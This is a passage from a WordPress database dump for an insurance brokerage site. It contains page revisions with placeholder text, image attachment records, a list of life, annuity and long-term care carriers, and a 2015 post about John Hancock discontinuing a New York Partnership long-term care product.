Aliquam sed ligula diam, et laoreet odio.\r\n<ul>\r\n <li><i class=\"icon-circle\"></i>List Item</li>\r\n <li><i class=\"icon-circle\"></i>List Item</li>\r\n <li><i class=\"icon-circle\"></i>List Item</li>\r\n</ul>\r\nNunc imperdiet ipsum quis purus porta sagittis ac sed arcu. Nulla placerat urna vestibulum elit sodales utimperdiet felis lobortis. Cras ornare luctus elit, at rhoncus ipsum rhoncus at. Lorem ipsum dolor sit amet, consecteturadipiscing elit. Integer quis feugiat nulla. Sed sem sapien, sollicitudin vitae lobortis a, consectetur nec nunc. Nunc congue felis at lorem ultricies aliquam. Quisque at leo in mi vulputate feugiat et eu magna.\r\n<p class=\"left-pragraph\">Curabitur orci risus, cursus at vestibulum et, tincidunt at mauris. Donec eget ipsum nunc, in pharetra purus. Mauris eget laoreet dui. . Donec eget ipsum nunc, in pharetra purus. Mauris eget laoPellentesque habitant morbi tristique seneestas.</p>\r\n\r\n<blockquote>Lorem ipsum dolor sit amet, consectetur adipiscing elit.</blockquote>\r\nClass aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Donec ut libero orci. Nunc eleifend mauris at augue eleifend sed eleifend sapien dapibus. Aliquam id odio vitae ipsum fringilla varius id ac magna. Fusce lorem turpis, volutpat eu bibendum id, luctus tincidunt leo.\r\n\r\n</div>','insentives','','inherit','open','open','','10-revision-v1','','','2014-04-30 18:36:03','2014-04-30 18:36:03','',10,'http://www.empireins.com/10-revision-v1/',0,'revision','',0),(230,1,'2014-05-05 17:38:21','2014-05-05 17:38:21','','Test','','private','open','open','','test','','','2014-12-15 15:49:20','2014-12-15 15:49:20','',0,'http://www.empireins.com/?page_id=230',0,'page','',0),(231,1,'2014-05-05 17:38:21','2014-05-05 17:38:21','','Test','','inherit','open','open','','230-revision-v1','','','2014-05-05 17:38:21','2014-05-05 17:38:21','',230,'http://www.empireins.com/230-revision-v1/',0,'revision','',0),(234,1,'2014-05-14 16:43:15','2014-05-14 16:43:15',' ','','','publish','open','open','','234','','','2015-12-11 09:02:53','2015-12-11 09:02:53','',0,'http://www.empireins.com/?p=234',6,'nav_menu_item','',0),(238,1,'2014-11-24 07:54:54','2014-11-24 07:54:54','','Product Information','','publish','closed','closed','','new-tools','','','2015-12-29 11:51:26','2015-12-29 11:51:26','',0,'http://www.empireins.com/?post_type=agent_tools&p=238',3,'agent_tools','',0),(239,1,'2014-11-24 07:54:54','2014-11-24 07:54:54','','New Tools','','inherit','open','open','','238-revision-v1','','','2014-11-24 07:54:54','2014-11-24 07:54:54','',238,'http://www.empireins.com/238-revision-v1/',0,'revision','',0),(253,1,'2014-11-24 18:00:41','2014-11-24 18:00:41','','Product Illustrations','','publish','closed','closed','','new-tools-2','','','2016-01-06 18:12:34','2016-01-06 18:12:34','',0,'http://www.empireins.com/?post_type=agent_tools&p=253',2,'agent_tools','',0),(254,1,'2014-11-24 18:06:30','2014-11-24 18:06:30','','1','','inherit','open','open','','1','','','2014-11-24 18:06:30','2014-11-24 18:06:30','',253,'http://www.empireins.com/wp-content/uploads/2014/11/1.png',0,'attachment','image/png',0),(255,1,'2014-11-25 19:36:39','2014-11-25 19:36:39','','2','','inherit','open','open','','2','','','2014-11-25 19:36:39','2014-11-25 19:36:39','',0,'http://www.empireins.com/wp-content/uploads/2014/11/2.png',0,'attachment','image/png',0),(256,1,'2014-11-25 19:36:41','2014-11-25 19:36:41','','3','','inherit','open','open','','3','','','2014-11-25 19:36:41','2014-11-25 19:36:41','',0,'http://www.empireins.com/wp-content/uploads/2014/11/3.png',0,'attachment','image/png',0),(257,1,'2014-11-25 19:36:43','2014-11-25 19:36:43','','4','','inherit','open','open','','4','','','2014-11-25 19:36:43','2014-11-25 19:36:43','',0,'http://www.empireins.com/wp-content/uploads/2014/11/4.png',0,'attachment','image/png',0),(258,1,'2014-11-25 19:36:45','2014-11-25 19:36:45','','5','','inherit','open','open','','5','','','2014-11-25 19:36:45','2014-11-25 19:36:45','',0,'http://www.empireins.com/wp-content/uploads/2014/11/5.png',0,'attachment','image/png',0),(259,1,'2014-11-25 19:36:47','2014-11-25 19:36:47','','6','','inherit','open','open','','6','','','2015-11-09 21:53:13','2015-11-09 21:53:13','',185,'http://www.empireins.com/wp-content/uploads/2014/11/6.png',0,'attachment','image/png',0),(260,1,'2014-11-25 19:37:02','2014-11-25 19:37:02','','ebix','','inherit','open','open','','ebix','','','2014-11-25 19:37:02','2014-11-25 19:37:02','',0,'http://www.empireins.com/wp-content/uploads/2014/11/ebix.png',0,'attachment','image/png',0),(261,1,'2014-11-25 19:37:03','2014-11-25 19:37:03','','ipipeline','','inherit','open','open','','ipipeline','','','2015-07-26 21:35:44','2015-07-26 21:35:44','',319,'http://www.empireins.com/wp-content/uploads/2014/11/ipipeline.png',0,'attachment','image/png',0),(262,1,'2014-11-25 19:37:05','2014-11-25 19:37:05','','right','','inherit','open','open','','right','','','2014-11-25 19:37:05','2014-11-25 19:37:05','',0,'http://www.empireins.com/wp-content/uploads/2014/11/right.png',0,'attachment','image/png',0),(263,1,'2014-11-25 20:09:58','2014-11-25 20:09:58','<div class=\"page-post-sub-content\">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus.</div>\r\n<div class=\"about-content\">\r\n\r\nCurabitur orci risus, cursus at vestibulum et, tincidunt at mauris. Donec eget ipsum nunc, in pharetra purus. Mauris eget laoreet dui. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Donec ut libero orci. Nunc eleifend mauris at augue eleifend sed eleifend sapien dapibus. Aliquam id odio vitae ipsum fringilla varius id ac magna. Fusce lorem turpis, volutpat eu bibendum id, luctus tincidunt leo.\r\n<h1>H1 - Donec interdum vestibulum est</h1>\r\n<h2>H2 - Donec interdum vestibulum est</h2>\r\n<h3>H2 - Donec interdum vestibulum est</h3>\r\n<h4>H2 - Donec interdum vestibulum est</h4>\r\nIntro text to the company Proin consequat erat ac urna iaculis rutrum ut sit amet dui. Aliquam sed ligula diam, et laoreet odio.\r\n<ul>\r\n <li><i class=\"icon-circle\"></i>List Item</li>\r\n <li><i class=\"icon-circle\"></i>List Item</li>\r\n <li><i class=\"icon-circle\"></i>List Item</li>\r\n</ul>\r\nNunc imperdiet ipsum quis purus porta sagittis ac sed arcu. Nulla placerat urna vestibulum elit sodales utimperdiet felis lobortis. Cras ornare luctus elit, at rhoncus ipsum rhoncus at. Lorem ipsum dolor sit amet, consecteturadipiscing elit. Integer quis feugiat nulla. Sed sem sapien, sollicitudin vitae lobortis a, consectetur nec nunc. Nunc congue felis at lorem ultricies aliquam. Quisque at leo in mi vulputate feugiat et eu magna.\r\n<p class=\"left-pragraph\">Curabitur orci risus, cursus at vestibulum et, tincidunt at mauris. Donec eget ipsum nunc, in pharetra purus. Mauris eget laoreet dui. . Donec eget ipsum nunc, in pharetra purus. Mauris eget laoPellentesque habitant morbi tristique seneestas.</p>\r\n\r\n<blockquote>Lorem ipsum dolor sit amet, consectetur adipiscing elit.</blockquote>\r\nClass aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Donec ut libero orci. Nunc eleifend mauris at augue eleifend sed eleifend sapien dapibus. Aliquam id odio vitae ipsum fringilla varius id ac magna. Fusce lorem turpis, volutpat eu bibendum id, luctus tincidunt leo.\r\n\r\n</div>','Agent Tools','','inherit','open','open','','181-autosave-v1','','','2014-11-25 20:09:58','2014-11-25 20:09:58','',181,'http://www.empireins.com/181-autosave-v1/',0,'revision','',0),(264,1,'2014-11-26 09:16:53','2014-11-26 09:16:53','','Agent Tools','','inherit','open','open','','181-revision-v1','','','2014-11-26 09:16:53','2014-11-26 09:16:53','',181,'http://www.empireins.com/?p=264',0,'revision','',0),(266,1,'2014-12-15 15:48:14','2014-12-15 15:48:14','<div class=\"page-post-sub-content\">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus.</div>\r\n<div class=\"about-content\">\r\n\r\nCurabitur orci risus, cursus at vestibulum et, tincidunt at mauris. Donec eget ipsum nunc, in pharetra purus. Mauris eget laoreet dui. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Donec ut libero orci. Nunc eleifend mauris at augue eleifend sed eleifend sapien dapibus. Aliquam id odio vitae ipsum fringilla varius id ac magna. Fusce lorem turpis, volutpat eu bibendum id, luctus tincidunt leo.\r\n<h1>H1 - Donec interdum vestibulum est</h1>\r\n<h2>H2 - Donec interdum vestibulum est</h2>\r\n<h3>H2 - Donec interdum vestibulum est</h3>\r\n<h4>H2 - Donec interdum vestibulum est</h4>\r\nIntro text to the company Proin consequat erat ac urna iaculis rutrum ut sit amet dui. Aliquam sed ligula diam, et laoreet odio.\r\n<ul>\r\n <li><i class=\"icon-circle\"></i>List Item</li>\r\n <li><i class=\"icon-circle\"></i>List Item</li>\r\n <li><i class=\"icon-circle\"></i>List Item</li>\r\n</ul>\r\nNunc imperdiet ipsum quis purus porta sagittis ac sed arcu. Nulla placerat urna vestibulum elit sodales utimperdiet felis lobortis. Cras ornare luctus elit, at rhoncus ipsum rhoncus at. Lorem ipsum dolor sit amet, consecteturadipiscing elit. Integer quis feugiat nulla. Sed sem sapien, sollicitudin vitae lobortis a, consectetur nec nunc. Nunc congue felis at lorem ultricies aliquam. Quisque at leo in mi vulputate feugiat et eu magna.\r\n<p class=\"left-pragraph\">Curabitur orci risus, cursus at vestibulum et, tincidunt at mauris. Donec eget ipsum nunc, in pharetra purus. Mauris eget laoreet dui. . Donec eget ipsum nunc, in pharetra purus. Mauris eget laoPellentesque habitant morbi tristique seneestas.</p>\r\n\r\n<blockquote>Lorem ipsum dolor sit amet, consectetur adipiscing elit.</blockquote>\r\nClass aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Donec ut libero orci. Nunc eleifend mauris at augue eleifend sed eleifend sapien dapibus. Aliquam id odio vitae ipsum fringilla varius id ac magna. Fusce lorem turpis, volutpat eu bibendum id, luctus tincidunt leo.\r\n\r\n</div>','Licensing','','inherit','open','open','','183-revision-v1','','','2014-12-15 15:48:14','2014-12-15 15:48:14','',183,'http://www.empireins.com/183-revision-v1/',0,'revision','',0),(267,1,'2014-12-15 15:48:39','2014-12-15 15:48:39','<div class=\"page-post-sub-content\">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus.</div>\r\n<div class=\"about-content\">\r\n\r\nCurabitur orci risus, cursus at vestibulum et, tincidunt at mauris. Donec eget ipsum nunc, in pharetra purus. Mauris eget laoreet dui. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Donec ut libero orci. Nunc eleifend mauris at augue eleifend sed eleifend sapien dapibus. Aliquam id odio vitae ipsum fringilla varius id ac magna. Fusce lorem turpis, volutpat eu bibendum id, luctus tincidunt leo.\r\n<h1>H1 - Donec interdum vestibulum est</h1>\r\n<h2>H2 - Donec interdum vestibulum est</h2>\r\n<h3>H2 - Donec interdum vestibulum est</h3>\r\n<h4>H2 - Donec interdum vestibulum est</h4>\r\nIntro text to the company Proin consequat erat ac urna iaculis rutrum ut sit amet dui. Aliquam sed ligula diam, et laoreet odio.\r\n<ul>\r\n <li><i class=\"icon-circle\"></i>List Item</li>\r\n <li><i class=\"icon-circle\"></i>List Item</li>\r\n <li><i class=\"icon-circle\"></i>List Item</li>\r\n</ul>\r\nNunc imperdiet ipsum quis purus porta sagittis ac sed arcu. Nulla placerat urna vestibulum elit sodales utimperdiet felis lobortis. Cras ornare luctus elit, at rhoncus ipsum rhoncus at. Lorem ipsum dolor sit amet, consecteturadipiscing elit. Integer quis feugiat nulla. Sed sem sapien, sollicitudin vitae lobortis a, consectetur nec nunc. Nunc congue felis at lorem ultricies aliquam. Quisque at leo in mi vulputate feugiat et eu magna.\r\n<p class=\"left-pragraph\">Curabitur orci risus, cursus at vestibulum et, tincidunt at mauris. Donec eget ipsum nunc, in pharetra purus. Mauris eget laoreet dui. . Donec eget ipsum nunc, in pharetra purus. Mauris eget laoPellentesque habitant morbi tristique seneestas.</p>\r\n\r\n<blockquote>Lorem ipsum dolor sit amet, consectetur adipiscing elit.</blockquote>\r\nClass aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Donec ut libero orci. Nunc eleifend mauris at augue eleifend sed eleifend sapien dapibus. Aliquam id odio vitae ipsum fringilla varius id ac magna. Fusce lorem turpis, volutpat eu bibendum id, luctus tincidunt leo.\r\n\r\n</div>','incentives','','inherit','open','open','','10-revision-v1','','','2014-12-15 15:48:39','2014-12-15 15:48:39','',10,'http://www.empireins.com/10-revision-v1/',0,'revision','',0),(268,1,'2014-12-15 15:58:16','2014-12-15 15:58:16','<div class=\"about-sub-content\">Welcome to EIB, where Life Solutions are Beyond Expectations!/div>\r\n<div class=\"about-content\">As the industry leader in insurance brokerage, we take great pride in providing brokers with the ultimate products needed to exceed their clients’ expectations. With EIB’s renowned attention to detail, and extensive resources you can be confident you will receive the very best policy package for each and every one of your clients. \r\nBy joining EIB you reap the benefits of our extensive experience and the strong relationships we have built with all major carriers and underwriters.\r\nAs an EIB broker, you will have access to the very latest developments in the industry by way of our constant research; whether it is the hottest products, latest news, or most competitive prices in the insurance field.</div>\r\n<div class=\"about-content\"It is a privilege to have you here.</div>','Home','','inherit','open','open','','6-revision-v1','','','2014-12-15 15:58:16','2014-12-15 15:58:16','',6,'http://www.empireins.com/6-revision-v1/',0,'revision','',0),(269,1,'2014-12-15 16:00:27','2014-12-15 16:00:27','<div class=\"about-sub-content\">\r\n\r\nWelcome to EIB, where Life Solutions are Beyond Expectations!/div>\r\n<div class=\"about-content\">As the industry leader in insurance brokerage, we take great pride in providing brokers with the ultimate products needed to exceed their clients’ expectations. With EIB’s renowned attention to detail, and extensive resources you can be confident you will receive the very best policy package for each and every one of your clients.\r\nBy joining EIB you reap the benefits of our extensive experience and the strong relationships we have built with all major carriers and underwriters.\r\nAs an EIB broker, you will have access to the very latest developments in the industry by way of our constant research; whether it is the hottest products, latest news, or most competitive prices in the insurance field.\r\nIt is a privilege to have you here.</div>\r\n','Home','','inherit','open','open','','6-revision-v1','','','2014-12-15 16:00:27','2014-12-15 16:00:27','',6,'http://www.empireins.com/6-revision-v1/',0,'revision','',0),(270,1,'2014-12-15 16:01:07','2014-12-15 16:01:07','<div class=\"about-sub-content\">\r\n\r\nWelcome to EIB, where Life Solutions are Beyond Expectations!\r\n<div class=\"about-content\">As the industry leader in insurance brokerage, we take great pride in providing brokers with the ultimate products needed to exceed their clients’ expectations. With EIB’s renowned attention to detail, and extensive resources you can be confident you will receive the very best policy package for each and every one of your clients.\r\nBy joining EIB you reap the benefits of our extensive experience and the strong relationships we have built with all major carriers and underwriters.\r\nAs an EIB broker, you will have access to the very latest developments in the industry by way of our constant research; whether it is the hottest products, latest news, or most competitive prices in the insurance field.\r\nIt is a privilege to have you here.</div>\r\n','Home','','inherit','open','open','','6-revision-v1','','','2014-12-15 16:01:07','2014-12-15 16:01:07','',6,'http://www.empireins.com/6-revision-v1/',0,'revision','',0),(271,1,'2014-12-15 16:01:56','2014-12-15 16:01:56','<div class=\"about-sub-content\">\r\n\r\nWelcome to EIB, where Life Solutions are Beyond Expectations!</div>\r\n<div class=\"about-content\">As the industry leader in insurance brokerage, we take great pride in providing brokers with the ultimate products needed to exceed their clients’ expectations. With EIB’s renowned attention to detail, and extensive resources you can be confident you will receive the very best policy package for each and every one of your clients.\r\nBy joining EIB you reap the benefits of our extensive experience and the strong relationships we have built with all major carriers and underwriters.\r\nAs an EIB broker, you will have access to the very latest developments in the industry by way of our constant research; whether it is the hottest products, latest news, or most competitive prices in the insurance field.\r\nIt is a privilege to have you here.</div>\r\n','Home','','inherit','open','open','','6-revision-v1','','','2014-12-15 16:01:56','2014-12-15 16:01:56','',6,'http://www.empireins.com/6-revision-v1/',0,'revision','',0),(273,1,'2015-11-09 21:55:53','2015-11-09 21:55:53','<div>EIB represents a full suite of carriers across three primary markets: Life Insurance, Annuities and Long-Term Care Insurance. Whether in the specialized market of New York or the balance of the 50 states, we have the carriers and products needed to deliver a superior outcome for your next client\'s insurance needs.</div>\n\n<hr />\n\n<h1>Life Insurance Carriers</h1>\n<a href=\"http://www.empireins.com/life-product-search/\" target=\"_blank\">Follow this link for more information about our Life Insurance Carriers and Products</a>\n<div class=\"about-content\">\n<ul>\n <li>American General Life Companies</li>\n <li>American National (ANICO)\nAmeritas Life / Ameritas Life of NY\nAthene\nAthene NY</li>\n <li>AXA\nBanner Life\nCompanion of New York\nFirst MetLife Investors Insurance Company\nGenworth Life and Annuity Insurance Company\nGenworth Life Insurance Company\nGenworth Life Insurance Company of New York</li>\n <li>Guardian Life\nHartford\nJohn Hancock\nLincoln National Life Insurance Company</li>\n <li>Mass Mutual\nMetLife (All Companies)\nMinnesota Life</li>\n <li>National Life of Vermont\nNationwide</li>\n <li>Penn Mutual\nPrincipal Life Insurance Company\nPrincipal National Life Insurance Company</li>\n <li>Protective Life\nProtective Life and Annuity of NY\nPrudential Financial</li>\n <li>New York Life\nReliastar Life Insurance Company\nReliastar Life Insurance Company of New York\nSBLI (Savings Bank Life Insurance Co of Mass)\nSecurian Life Insurance Company\nSecurity Mutual Life Insurance Company of New York, Binghamton, NY</li>\n <li>Symetra Financial\nTransamerica Financial Life Insurance Co\nTransamerica Life Insurance Co.\nUnited of Omaha</li>\n <li>US Life\nVoya Financial\nWilliam Penn</li>\n</ul>\n\n<hr />\n\n<h1>Annuity Carriers</h1>\n<a href=\"http://www.empireins.com/annuity-product-search/\" target=\"_blank\">Follow this link for more information about our Annuity Carriers and Products</a>\n<ul>\n <li>AIG Annuities Fixed & Index</li>\n <li>AIG Annuities Fixed & Index of NY</li>\n <li>Allianz Life Insurance Company of North America</li>\n <li>American General Life Companies - All states except NY (AGL)</li>\n <li>American National</li>\n <li>Ameritas Life / Ameritas Life of NY</li>\n <li>Athene</li>\n <li>Athene Annuity & Life Assurance Company</li>\n <li>Columbus Life Insurance Company</li>\n <li>Companion of New York</li>\n <li>EquiTrust Life</li>\n <li>Fidelity & Guaranty Life</li>\n <li>Fidelity & Guaranty Life of NY</li>\n <li>First MetLife Investors Insurance Company</li>\n <li>Genworth Life and Annuity Insurance Company</li>\n <li>Genworth Life Insurance Company</li>\n <li>Genworth Life Insurance Company of New York</li>\n <li>Integrity Life Insurance Company</li>\n <li>Jackson National Life</li>\n <li>Jackson National Life of New York</li>\n <li>Lincoln National Life Insurance Company</li>\n <li>MetLife (All Companies)</li>\n <li>National Integrity Life Insurance Company</li>\n <li>National Life Group - Life Ins. Co. of the Southwest</li>\n <li>Nationwide</li>\n <li>New York Life</li>\n <li>North American Company for Life and Health Insurance®</li>\n <li>Penn Mutual</li>\n <li>Principal Life Insurance Company</li>\n <li>Protective Life</li>\n <li>Reliance Standard Life</li>\n <li>Security Mutual Life Insurance Company of New York, Binghamton, NY</li>\n <li>Standard Insurance Company</li>\n <li>United of Omaha</li>\n <li>Voya Insurance and Annuity Company</li>\n</ul>\n\n<hr />\n\n<h1>Long-Term Care Insurance Carriers</h1>\n<ul>\n <li>Allianz Life Insurance Company of North America</li>\n <li>Athene NY</li>\n <li>Genworth Life Insurance Company</li>\n <li>Genworth Life Insurance Company of New York</li>\n <li>John Hancock</li>\n <li>MassMutual</li>\n <li>MetLife (All Companies)</li>\n <li>Mutual of Omaha</li>\n <li>New York Life</li>\n <li>Prudential Financial</li>\n</ul>\n<h3></h3>\n</div>','Carriers','','inherit','open','open','','185-autosave-v1','','','2015-11-09 21:55:53','2015-11-09 21:55:53','',185,'http://www.empireins.com/185-autosave-v1/',0,'revision','',0),(274,1,'2015-02-23 01:22:06','2015-02-23 01:22:06','<div class=\"page-post-sub-content\" style=\"text-align: justify;\">EIB represents a full suite of carriers across three primary markets: Life Insurance, Annuities and Long-Term Care Insurance. Whether in the specialized market of New York of the balance of the 50 states, we have the carriers and products needed to deliver a superior outcome for your next client\'s insurance needs.</div>\r\n\r\n<hr />\r\n\r\n<h1>Life Insurance Carriers</h1>\r\n<div class=\"about-content\">\r\n<ul>\r\n <li>American General Life Companies - All states except NY (AGL)</li>\r\n <li>American National\r\nAmeritas Life / Ameritas Life of NY\r\nAthene\r\nAthene NY\r\nBanner Life\r\nCompanion of New York\r\nFirst MetLife Investors Insurance Company\r\nGenworth Life and Annuity Insurance Company\r\nGenworth Life Insurance Company\r\nGenworth Life Insurance Company of New York\r\nHartford\r\nJohn Hancock\r\nLincoln Benefit Life\r\nLincoln National Life Insurance Company\r\nMetLife (All Companies)\r\nMinnesota Life\r\nNationwide\r\nPrincipal Life Insurance Company\r\nPrincipal National Life Insurance Company</li>\r\n <li>Protective Life\r\nProtective Life and Annuity of NY (Independent/BGA)\r\nProtective Life and Annuity of NY (Institutional)\r\nPrudential Financial\r\nReliastar Life Insurance Company\r\nReliastar Life Insurance Company of New York\r\nSBLI (Savings Bank Life Insurance Co of Mass)\r\nSecurian Life Insurance Company\r\nSecurity Mutual Life Insurance Company of New York, Binghamton, NY\r\nTransamerica Financial Life Insurance Co\r\nTransamerica Life Insurance Co.\r\nUnited of Omaha\r\nVoya Financial\r\nWilliam Penn</li>\r\n</ul>\r\n\r\n<hr />\r\n\r\n<h1>Annuity Carriers</h1>\r\n<ul>\r\n <li>AIG Annuities Fixed & Index</li>\r\n <li>AIG Annuities Fixed & Index of NY</li>\r\n <li>Allianz Life Insurance Company of North America</li>\r\n <li>American General Life Companies - All states except NY (AGL)</li>\r\n <li>American National</li>\r\n <li>Ameritas Life / Ameritas Life of NY</li>\r\n <li>Athene</li>\r\n <li>Athene Annuity & Life Assurance Company</li>\r\n <li>Columbus Life Insurance Company</li>\r\n <li>Companion of New York</li>\r\n <li>EquiTrust Life</li>\r\n <li>Fidelity & Guaranty Life</li>\r\n <li>Fidelity & Guaranty Life of NY</li>\r\n <li>First MetLife Investors Insurance Company</li>\r\n <li>Genworth Life and Annuity Insurance Company</li>\r\n <li>Genworth Life Insurance Company</li>\r\n <li>Genworth Life Insurance Company of New York</li>\r\n <li>Integrity Life Insurance Company</li>\r\n <li>Jackson National Life</li>\r\n <li>Jackson National Life of New York</li>\r\n <li>Lincoln National Life Insurance Company</li>\r\n <li>MetLife (All Companies)</li>\r\n <li>National Integrity Life Insurance Company</li>\r\n <li>National Life Group - Life Ins. Co. of the Southwest</li>\r\n <li>Nationwide</li>\r\n <li>New York Life</li>\r\n <li>North American Company for Life and Health Insurance®</li>\r\n <li>Penn Mutual</li>\r\n <li>Principal Life Insurance Company</li>\r\n <li>Protective Life</li>\r\n <li>Reliance Standard Life</li>\r\n <li>Security Mutual Life Insurance Company of New York, Binghamton, NY</li>\r\n <li>Standard Insurance Company</li>\r\n <li>United of Omaha</li>\r\n <li>Voya Insurance and Annuity Company</li>\r\n</ul>\r\n\r\n<hr />\r\n\r\n<h1>Long-Term Care Insurance Carriers</h1>\r\n<ul>\r\n <li>Allianz Life Insurance Company of North America</li>\r\n <li>Athene NY</li>\r\n <li>Genworth Life Insurance Company</li>\r\n <li>Genworth Life Insurance Company of New York</li>\r\n <li>John Hancock</li>\r\n <li>MassMutual</li>\r\n <li>MetLife (All Companies)</li>\r\n <li>Mutual of Omaha</li>\r\n <li>New York Life</li>\r\n <li>Prudential Financial</li>\r\n</ul>\r\n<h3></h3>\r\n</div>','Carriers','','inherit','open','open','','185-revision-v1','','','2015-02-23 01:22:06','2015-02-23 01:22:06','',185,'http://www.empireins.com/185-revision-v1/',0,'revision','',0),(277,1,'2015-02-19 11:00:56','2015-02-19 11:00:56','<p style=\"text-align: justify;\">Change is coming in the John Hancock Long-Term Care Portfolio. Effective April 27, 2015, they will no longer offer the New York Partnership Custom Care III. Read on for the transition rules, as well as a reminder of the LTC products that remain for sale in New York, including the LTC Rider available on many of their life insurance policies.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h2>John Hancock to Discontinue the Sale of its New York Partnership LTCI Product</h2>\r\nFrom John Hancock:\r\n<p style=\"padding-left: 30px;\"><em>John Hancock regularly monitors our long-term care insurance product portfolio to ensure that it continues to meet the needs of our customers and distributors. After a thorough analysis of our</em></p>\r\n<p style=\"padding-left: 30px;\"><em>New York long-term care insurance business, we have made the difficult decision to discontinue sales of our New York Partnership individual long-term care insurance policies (Policy Forms: LTC-11 NYP and LTC-11 SGNYP) effective April 27th, 2015. Our LTC product portfolio is moving in a different direction than New York Partnership product requirements allow.</em></p>\r\n<p style=\"padding-left: 30px;\"><em>We will continue to market our non-Partnership product, Custom Care III featuring Benefit Builder (Policy Forms LTC-11 NY and SG-11 NY), in New York. We commend and appreciate the dedication, work and advocacy of the New York Partnership staff as it relates to New York Partnership policyholders. We also remain committed to working with the New York Partnership and industry on matters that are important to our policyholders.</em></p>\r\n<strong>Transition Rules:</strong>\r\n<ul>\r\n <li>All individual long-term care insurance applications for New York Partnership policies must be signed by April 27th, 2015 and received in the Home Office by May 4th, 2015.</li>\r\n <li>Any New York Partnership applications received after May 4th, 2015 will not be processed.</li>\r\n</ul>\r\n<strong>Important:</strong>\r\n<ul>\r\n <li>These changes have no impact on existing, in force NY Partnership policies.</li>\r\n <li>There is no change to the LTC Rider available on many John Hancock Life Insurance policies at this time.</li>\r\n <li>Expect a new LTC product from John Hancock to be announced in the near future.</li>\r\n <li>Please see the <a href=\"http://www.empireins.com/wp-content/uploads/2015/02/LTCNewslink_NYP_Disc.pdf\" target=\"_blank\">formal announcement from John Hancock</a> for additional details.</li>\r\n</ul>','ProdMod: John Hancock is Discontinuing Sale of NY Partnership Custom Care III LTC Product','','publish','open','open','','prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product','','','2015-12-13 18:48:53','2015-12-13 18:48:53','',0,'http://www.empireins.com/?p=277',0,'post','',0),(278,1,'2015-02-23 01:54:32','2015-02-23 01:54:32','ProdMod: John Hancock is Discontinuing Sale of NY Partnership Custom Care III LTC Product\r\n\r\nJH - For AIN BlogChange is coming in the John Hancock Long-Term Care Portfolio. Effective April 27, 2015, they will no longer offer the New York Partnership Custom Care III. Read on for the transition rules, as well as a reminder of the LTC products that remain for sale in New York, including the LTC Rider available on many of their life insurance policies.\r\n\r\nJohn Hancock to Discontinue the Sale of its New York Partnership LTCI Product\r\n\r\nFrom John Hancock:\r\n\r\nJohn Hancock regularly monitors our long-term care insurance product portfolio to ensure that it continues to meet the needs of our customers and distributors. After a thorough analysis of our\r\n\r\nNew York long-term care insurance business, we have made the difficult decision to discontinue sales of our New York Partnership individual long-term care insurance policies (Policy Forms: LTC-11 NYP and LTC-11 SGNYP) effective April 27th, 2015. Our LTC product portfolio is moving in a different direction than New York Partnership product requirements allow.\r\n\r\nWe will continue to market our non-Partnership product, Custom Care III featuring Benefit Builder (Policy Forms LTC-11 NY and SG-11 NY), in New York. We commend and appreciate the dedication, work and advocacy of the New York Partnership staff as it relates to New York Partnership policyholders. We also remain committed to working with the New York Partnership and industry on matters that are important to our policyholders.\r\n\r\nTransition Rules:\r\n\r\nAll individual long-term care insurance applications for New York Partnership policies must be signed by April 27th, 2015 and received in the Home Office by May 4th, 2015.\r\nAny New York Partnership applications received after May 4th, 2015 will not be processed.\r\nImportant:\r\n\r\nThese changes have no impact on existing, in force NY Partnership policies.\r\nThere is no change to the LTC Rider available on many John Hancock Life Insurance policies at this time.\r\nExpect a new LTC product from John Hancock to be announced in the near future.\r\nPlease see the formal announcement from John Hancock for additional details.','','','inherit','open','open','','277-revision-v1','','','2015-02-23 01:54:32','2015-02-23 01:54:32','',277,'http://www.empireins.com/277-revision-v1/',0,'revision','',0),(279,1,'2015-02-23 01:55:58','2015-02-23 01:55:58','Change is coming in the John Hancock Long-Term Care Portfolio. Effective April 27, 2015, they will no longer offer the New York Partnership Custom Care III. Read on for the transition rules, as well as a reminder of the LTC products that remain for sale in New York, including the LTC Rider available on many of their life insurance policies.\r\n\r\n<hr />\r\n\r\n<h2>John Hancock to Discontinue the Sale of its New York Partnership LTCI Product</h2>\r\nFrom John Hancock:\r\n<p style=\"padding-left: 30px;\"><em>John Hancock regularly monitors our long-term care insurance product portfolio to ensure that it continues to meet the needs of our customers and distributors. After a thorough analysis of our</em></p>\r\n<p style=\"padding-left: 30px;\"><em>New York long-term care insurance business, we have made the difficult decision to discontinue sales of our New York Partnership individual long-term care insurance policies (Policy Forms: LTC-11 NYP and LTC-11 SGNYP) effective April 27th, 2015. Our LTC product portfolio is moving in a different direction than New York Partnership product requirements allow.</em></p>\r\n<p style=\"padding-left: 30px;\"><em>We will continue to market our non-Partnership product, Custom Care III featuring Benefit Builder (Policy Forms LTC-11 NY and SG-11 NY), in New York. We commend and appreciate the dedication, work and advocacy of the New York Partnership staff as it relates to New York Partnership policyholders. We also remain committed to working with the New York Partnership and industry on matters that are important to our policyholders.</em></p>\r\n<strong>Transition Rules:</strong>\r\n<ul>\r\n <li>All individual long-term care insurance applications for New York Partnership policies must be signed by April 27th, 2015 and received in the Home Office by May 4th, 2015.</li>\r\n <li>Any New York Partnership applications received after May 4th, 2015 will not be processed.</li>\r\n</ul>\r\n<strong>Important:</strong>\r\n<ul>\r\n <li>These changes have no impact on existing, in force NY Partnership policies.</li>\r\n <li>There is no change to the LTC Rider available on many John Hancock Life Insurance policies at this time.</li>\r\n <li>Expect a new LTC product from John Hancock to be 